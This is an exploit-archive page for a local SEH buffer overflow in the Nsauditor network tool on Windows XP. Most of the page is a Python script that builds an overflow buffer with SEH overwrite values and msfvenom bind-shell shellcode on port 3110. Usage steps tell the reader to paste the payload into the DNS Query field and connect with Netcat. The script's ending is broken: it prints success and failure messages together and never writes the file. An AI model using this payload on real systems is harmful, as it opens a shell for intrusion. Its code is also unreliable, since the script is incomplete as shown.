Nsauditor local seh buffer overflow Vulnerability / Exploit

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Exploits / Vulnerability Discovered : 2018-12-18 | Type : local | Platform : windows
This exploit / vulnerability Nsauditor local seh buffer overflow is for educational purposes only and if it is used you will do on your own risk!

[+] Code ...

# Exploit Title: Nsauditor Local SEH Buffer Overflow
# Date: 15-12-2018
# Vendor Homepage:http://www.nsauditor.com
# Software Link: http://www.nsauditor.com/downloads/nsauditor_setup.exe
# Exploit Author: Achilles
# Tested Version:
# Tested on: Windows XP SP3

# 1.- Run python code : Nsauditor.py
# 2.- Open EVIL.txt and copy content to clipboard
# 3.- Open Nsauditor
# 4.- In the Window select 'Tools' > 'Dns Lookup'
# 5.- Paste the content of EVIL.txt into the Field: 'Dns Query'
# 6.- Click 'Resolve'
# 7.- Connect with Netcat on port 3110


buffer = "\x41" * 5235
NSEH = "\xeb\x06\x90\x90" #jmp short 6
SEH = "\x30\xFF\xE6\x01" #nsnetutils.dll
nops = "\x90" * 20

#badchar \x00\x0a\x0d\x2e
#msfvenom Bind port 3110
buf = ""
buf += "\xd9\xc7\xb8\x8e\xe7\x77\xf1\xd9\x74\x24\xf4\x5b\x29"
buf += "\xc9\xb1\x53\x83\xeb\xfc\x31\x43\x13\x03\xcd\xf4\x95"
buf += "\x04\x2d\x12\xdb\xe7\xcd\xe3\xbc\x6e\x28\xd2\xfc\x15"
buf += "\x39\x45\xcd\x5e\x6f\x6a\xa6\x33\x9b\xf9\xca\x9b\xac"
buf += "\x4a\x60\xfa\x83\x4b\xd9\x3e\x82\xcf\x20\x13\x64\xf1"
buf += "\xea\x66\x65\x36\x16\x8a\x37\xef\x5c\x39\xa7\x84\x29"
buf += "\x82\x4c\xd6\xbc\x82\xb1\xaf\xbf\xa3\x64\xbb\x99\x63"
buf += "\x87\x68\x92\x2d\x9f\x6d\x9f\xe4\x14\x45\x6b\xf7\xfc"
buf += "\x97\x94\x54\xc1\x17\x67\xa4\x06\x9f\x98\xd3\x7e\xe3"
buf += "\x25\xe4\x45\x99\xf1\x61\x5d\x39\x71\xd1\xb9\xbb\x56"
buf += "\x84\x4a\xb7\x13\xc2\x14\xd4\xa2\x07\x2f\xe0\x2f\xa6"
buf += "\xff\x60\x6b\x8d\xdb\x29\x2f\xac\x7a\x94\x9e\xd1\x9c"
buf += "\x77\x7e\x74\xd7\x9a\x6b\x05\xba\xf2\x58\x24\x44\x03"
buf += "\xf7\x3f\x37\x31\x58\x94\xdf\x79\x11\x32\x18\x7d\x08"
buf += "\x82\xb6\x80\xb3\xf3\x9f\x46\xe7\xa3\xb7\x6f\x88\x2f"
buf += "\x47\x8f\x5d\xc5\x4f\x36\x0e\xf8\xb2\x88\xfe\xbc\x1c"
buf += "\x61\x15\x33\x43\x91\x16\x99\xec\x3a\xeb\x22\x1e\x9d"
buf += "\x62\xc4\x74\xf1\x22\x5e\xe0\x33\x11\x57\x97\x4c\x73"
buf += "\xcf\x3f\x04\x95\xc8\x40\x95\xb3\x7e\xd6\x1e\xd0\xba"
buf += "\xc7\x20\xfd\xea\x90\xb7\x8b\x7a\xd3\x26\x8b\x56\x83"
buf += "\xcb\x1e\x3d\x53\x85\x02\xea\x04\xc2\xf5\xe3\xc0\xfe"
buf += "\xac\x5d\xf6\x02\x28\xa5\xb2\xd8\x89\x28\x3b\xac\xb6"
buf += "\x0e\x2b\x68\x36\x0b\x1f\x24\x61\xc5\xc9\x82\xdb\xa7"
buf += "\xa3\x5c\xb7\x61\x23\x18\xfb\xb1\x35\x25\xd6\x47\xd9"
buf += "\x94\x8f\x11\xe6\x19\x58\x96\x9f\x47\xf8\x59\x4a\xcc"
buf += "\x08\x10\xd6\x65\x81\xfd\x83\x37\xcc\xfd\x7e\x7b\xe9"
buf += "\x7d\x8a\x04\x0e\x9d\xff\x01\x4a\x19\xec\x7b\xc3\xcc"
buf += "\x12\x2f\xe4\xc4"

payload = buffer + NSEH + SEH + nops + buf
print "[+] Creating %s bytes evil payload.." %len(payload)
print "[+] File created!"
print "File cannot be created"